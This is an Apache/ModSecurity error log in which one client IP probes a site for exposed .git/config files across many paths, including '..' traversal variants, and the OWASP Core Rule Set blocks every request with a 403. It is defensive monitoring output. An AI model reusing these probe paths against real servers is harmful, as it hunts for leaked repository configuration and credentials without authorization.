[Sat Jul 29 05:51:00.434601 2023] [:error] [pid 1026832] [client 18.222.143.90:44904] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/v1/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEAAAAAM"]
[Sat Jul 29 05:51:00.434793 2023] [:error] [pid 1026832] [client 18.222.143.90:44904] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/v1/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEAAAAAM"]
[Sat Jul 29 05:51:00.514056 2023] [authz_core:error] [pid 1026831] [client 18.222.143.90:44912] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Sat Jul 29 05:51:00.569051 2023] [:error] [pid 1026837] [client 18.222.143.90:45328] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5epAAAAAU"]
[Sat Jul 29 05:51:00.569336 2023] [:error] [pid 1026837] [client 18.222.143.90:45328] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5epAAAAAU"]
[Sat Jul 29 05:51:00.569500 2023] [:error] [pid 1026837] [client 18.222.143.90:45328] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5epAAAAAU"]
[Sat Jul 29 05:51:00.571032 2023] [:error] [pid 1029094] [client 18.222.143.90:45006] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/img../.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_QAAAAc"]
[Sat Jul 29 05:51:00.571219 2023] [:error] [pid 1026833] [client 18.222.143.90:44926] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /beta/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/beta/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72OAAAAAQ"]
[Sat Jul 29 05:51:00.571259 2023] [:error] [pid 1029094] [client 18.222.143.90:45006] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/img../.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_QAAAAc"]
[Sat Jul 29 05:51:00.571413 2023] [:error] [pid 1029094] [client 18.222.143.90:45006] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/img../.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_QAAAAc"]
[Sat Jul 29 05:51:00.571420 2023] [:error] [pid 1026833] [client 18.222.143.90:44926] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/beta/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72OAAAAAQ"]
[Sat Jul 29 05:51:00.571581 2023] [:error] [pid 1026833] [client 18.222.143.90:44926] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/beta/.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72OAAAAAQ"]
[Sat Jul 29 05:51:00.571975 2023] [:error] [pid 1029471] [client 18.222.143.90:45114] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /new/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.git/config"] [unique_id "ZMSMpK7_UrsKgyKvoFRz5QAAAAg"]
[Sat Jul 29 05:51:00.572222 2023] [:error] [pid 1029471] [client 18.222.143.90:45114] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.git/config"] [unique_id "ZMSMpK7_UrsKgyKvoFRz5QAAAAg"]
[Sat Jul 29 05:51:00.572394 2023] [:error] [pid 1029471] [client 18.222.143.90:45114] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.git/config"] [unique_id "ZMSMpK7_UrsKgyKvoFRz5QAAAAg"]
[Sat Jul 29 05:51:00.573144 2023] [:error] [pid 1028943] [client 18.222.143.90:44976] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /samples/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/samples/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PgAAAAY"]
[Sat Jul 29 05:51:00.573323 2023] [:error] [pid 1028943] [client 18.222.143.90:44976] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/samples/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PgAAAAY"]
[Sat Jul 29 05:51:00.573453 2023] [:error] [pid 1028943] [client 18.222.143.90:44976] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/samples/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PgAAAAY"]
[Sat Jul 29 05:51:00.574260 2023] [:error] [pid 1026830] [client 18.222.143.90:45214] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-includes/js/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-includes/js/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0wAAAAE"]
[Sat Jul 29 05:51:00.574431 2023] [:error] [pid 1026830] [client 18.222.143.90:45214] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-includes/js/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0wAAAAE"]
[Sat Jul 29 05:51:00.574565 2023] [:error] [pid 1026830] [client 18.222.143.90:45214] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-includes/js/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx0wAAAAE"]
[Sat Jul 29 05:51:00.574599 2023] [:error] [pid 1026829] [client 18.222.143.90:45388] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/content../.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpQAAAAA"]
[Sat Jul 29 05:51:00.574789 2023] [:error] [pid 1026829] [client 18.222.143.90:45388] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/content../.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpQAAAAA"]
[Sat Jul 29 05:51:00.574914 2023] [:error] [pid 1026829] [client 18.222.143.90:45388] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/content../.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpQAAAAA"]
[Sat Jul 29 05:51:00.675109 2023] [:error] [pid 1026832] [client 18.222.143.90:45258] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /user/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/user/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEQAAAAM"]
[Sat Jul 29 05:51:00.675355 2023] [:error] [pid 1026832] [client 18.222.143.90:45258] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/user/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEQAAAAM"]
[Sat Jul 29 05:51:00.675532 2023] [:error] [pid 1026832] [client 18.222.143.90:45258] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/user/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEQAAAAM"]
[Sat Jul 29 05:51:00.748136 2023] [:error] [pid 1026831] [client 18.222.143.90:45362] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /shop/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/shop/.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXgAAAAI"]
[Sat Jul 29 05:51:00.748390 2023] [:error] [pid 1026831] [client 18.222.143.90:45362] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/shop/.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXgAAAAI"]
[Sat Jul 29 05:51:00.748567 2023] [:error] [pid 1026831] [client 18.222.143.90:45362] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/shop/.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXgAAAAI"]
[Sat Jul 29 05:51:00.798837 2023] [:error] [pid 1026837] [client 18.222.143.90:45100] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/css../.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5epQAAAAU"]
[Sat Jul 29 05:51:00.799076 2023] [:error] [pid 1026837] [client 18.222.143.90:45100] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/css../.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5epQAAAAU"]
[Sat Jul 29 05:51:00.799214 2023] [:error] [pid 1026837] [client 18.222.143.90:45100] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/css../.git/config"] [unique_id "ZMSMpKNEleSPIL4joq5epQAAAAU"]
[Sat Jul 29 05:51:00.800853 2023] [:error] [pid 1029094] [client 18.222.143.90:44948] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /build/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_gAAAAc"]
[Sat Jul 29 05:51:00.801069 2023] [:error] [pid 1029094] [client 18.222.143.90:44948] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_gAAAAc"]
[Sat Jul 29 05:51:00.801203 2023] [:error] [pid 1029094] [client 18.222.143.90:44948] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/build/.git/config"] [unique_id "ZMSMpLZKcTjH6iUwxOkx_gAAAAc"]
[Sat Jul 29 05:51:00.802119 2023] [:error] [pid 1026833] [client 18.222.143.90:45272] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72OQAAAAQ"]
[Sat Jul 29 05:51:00.802419 2023] [:error] [pid 1026833] [client 18.222.143.90:45272] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72OQAAAAQ"]
[Sat Jul 29 05:51:00.802629 2023] [:error] [pid 1026833] [client 18.222.143.90:45272] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "ZMSMpJI37g2UFZcDSq72OQAAAAQ"]
[Sat Jul 29 05:51:00.804769 2023] [:error] [pid 1028943] [client 18.222.143.90:45280] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /data/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PwAAAAY"]
[Sat Jul 29 05:51:00.805111 2023] [:error] [pid 1028943] [client 18.222.143.90:45280] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PwAAAAY"]
